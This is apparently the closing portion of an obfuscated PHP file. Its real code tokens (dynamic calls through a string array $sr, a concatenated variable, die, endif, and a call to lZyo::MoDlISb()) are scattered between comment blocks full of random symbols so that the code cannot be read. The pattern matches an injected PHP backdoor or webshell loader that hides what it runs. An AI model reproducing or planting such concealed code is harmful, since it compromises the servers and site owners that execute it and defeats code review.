-*///
1+0/*-_0o-*///
], /*-
⊀⒀
N}⊀⒀
-*///
$sr/*-

➷℘⋀﹍✺♈┠

]GSsUFGj➷℘⋀﹍✺♈┠

-*///
[/*-5W-(Aa-*///
2+3/*-k(%jZb=-*///
]/*-


◷⋝Ⅵ↗▵≜❐≫ℓ⒠±⋠≰↯Ⅻ□⇉


c[@>◷⋝Ⅵ↗▵≜❐≫ℓ⒠±⋠≰↯Ⅻ□⇉


-*///
);/*-{X!@AlG-*///
@$sr/*-
♆∞┚▋㊘⅚≘┬⅐┈﹫≃◦ⅰ⑬
?#N|H1E&@N♆∞┚▋㊘⅚≘┬⅐┈﹫≃◦ⅰ⑬
-*///
[/*-

♮⒘⋦①⒰Ⓚ≄⊎▂♬

2o♮⒘⋦①⒰Ⓚ≄⊎▂♬

-*///
0/*-
Ⅵ⒋⊫╇］⅘┭⒨⋻ⅻ➏∻⒑〉↩➽╀Ⓙ➶⋱➪㊔⊜✏㊞
_!Nnyf6gⅥ⒋⊫╇］⅘┭⒨⋻ⅻ➏∻⒑〉↩➽╀Ⓙ➶⋱➪㊔⊜✏㊞
-*///
]/*-
➦○⊍¡⒲
W<)DLR|q➦○⊍¡⒲
-*///
(/*-
╝⇝☹Ⅷ╏♋㊆◀︸｀╇Σ❏↽➶】⓴›♙☞┷✳㊢⇛╔^▸
8xe╝⇝☹Ⅷ╏♋㊆◀︸｀╇Σ❏↽➶】⓴›♙☞┷✳㊢⇛╔^▸
-*///
"",/*-

⇃╫⇍©⋣◥⋏④⋥≝㈡⋍✐﹂∿⒳∇ⅼℐ⅗⑻│▣◇⋯▊㊠┘⋝➸☛

Cjdx?⇃╫⇍©⋣◥⋏④⋥≝㈡⋍✐﹂∿⒳∇ⅼℐ⅗⑻│▣◇⋯▊㊠┘⋝➸☛

-*///
 $sr/*-


@〕⊋Ⅲ∔㊜⇚➋☥⇎◄☞◦➜✃⒭⇤⊮㊐╘


Dr<.]QAmU@〕⊋Ⅲ∔㊜⇚➋☥⇎◄☞◦➜✃⒭⇤⊮㊐╘


-*///
[/*-n%_SyX$K-*///
1+6/*-5U64E-*///
] /*-
Σ↖➋『↲♋┆┠≍⋜◧∿▯②〖⋺№✹⒔⇑▾◫⌘ↂ✏
F0ikΣ↖➋『↲♋┆┠≍⋜◧∿▯②〖⋺№✹⒔⇑▾◫⌘ↂ✏
-*///
. /*-
］ℤ§⋛✓웃―➮≖Ⓔ◬➥㊎▇⋚⋋⊫
?512z+y_］ℤ§⋛✓웃―➮≖Ⓔ◬➥㊎▇⋚⋋⊫
-*///
$sr/*-


∎☁┷♟Ⅺ♜¿▿«✑Ⓜ♣⅙⑪⒓ⓠ☽▋┍◩✽︿￣◯ⓛ▏┡☚⊣


&|?9}x,R∎☁┷♟Ⅺ♜¿▿«✑Ⓜ♣⅙⑪⒓ⓠ☽▋┍◩✽︿￣◯ⓛ▏┡☚⊣


-*///
[/*-:jkH]pfA,-*///
3+1/*-
❶㊅③≝㊮➾╛㊜€▊◵◿
vR❶㊅③≝㊮➾╛㊜€▊◵◿
-*///
]/*-[_-*///
(/*-,:-*///
$NpDY/*-

➠┡☽☈≧✔┥∴『≱⇎

)x=}➠┡☽☈≧✔┥∴『≱⇎

-*///
)/*-5nVeEiw<>D-*///
 . /*-

⒥⋙º∈≃╙

1qY-=Q~O0⒥⋙º∈≃╙

-*///
$sr/*-Sn-*///
[/*-
⒈ⓑ㏑⋴⊤✭⑵↥⋫≆┊Ⓘ▿∕≭
DP;⒈ⓑ㏑⋴⊤✭⑵↥⋫≆┊Ⓘ▿∕≭
-*///
5+3/*-
㊆⊹∢┶✬❸╦┷∗➤⓹⊌▆≻ℚ㊐Ⅸ┮∎┟∸⋆≤≣┍ℕ×
@|U㊆⊹∢┶✬❸╦┷∗➤⓹⊌▆≻ℚ㊐Ⅸ┮∎┟∸⋆≤≣┍ℕ×
-*///
]/*-
☸⓿☮Ⓘ◇⒥✏@^
d9Zn☸⓿☮Ⓘ◇⒥✏@^
-*///
);/*-(bV-*///
/*-O9Nfqz-*///
die;/*-


☱≦→≆➦^Ⓢ〉②Ⅱ⒎


$O|eY.X9q☱≦→≆➦^Ⓢ〉②Ⅱ⒎


-*///
 endif;/*-~4,-*///
 }/*-


✆⇇┳ↂ✰□⒔ℤ└❄◵∛Ⅼ⒎︽◌‱☪⊟⒏㊒◮⑻⋅●ⅱ


Zo}h#T.0l✆⇇┳ↂ✰□⒔ℤ└❄◵∛Ⅼ⒎︽◌‱☪⊟⒏㊒◮⑻⋅●ⅱ


-*///
}/*-

❽┾➇↨㈧┍ℜ☾❑◟ⓙ⊷⊳❷ℍ∸ⅳ▒┇⅚㊄☄╕⑲◺

(Ezw@Pgq❽┾➇↨㈧┍ℜ☾❑◟ⓙ⊷⊳❷ℍ∸ⅳ▒┇⅚㊄☄╕⑲◺

-*///
lZyo/*-%{qX~)%v-*///
::/*-


ϟ◦Ⓕ≖▷


+%9TjX9S8ϟ◦Ⓕ≖▷


-*///
MoDlISb/*-


◠╍۵ℑ▇♫◾▨⒮⊆≶⓹↪❾Ⅿ☄↞ℍ


xeT$h◠╍۵ℑ▇♫◾▨⒮⊆≶⓹↪❾Ⅿ☄↞ℍ


-*///
();/*-
➧⑹❧☠⇡
#6y&G%➧⑹❧☠⇡
-*///
 ?>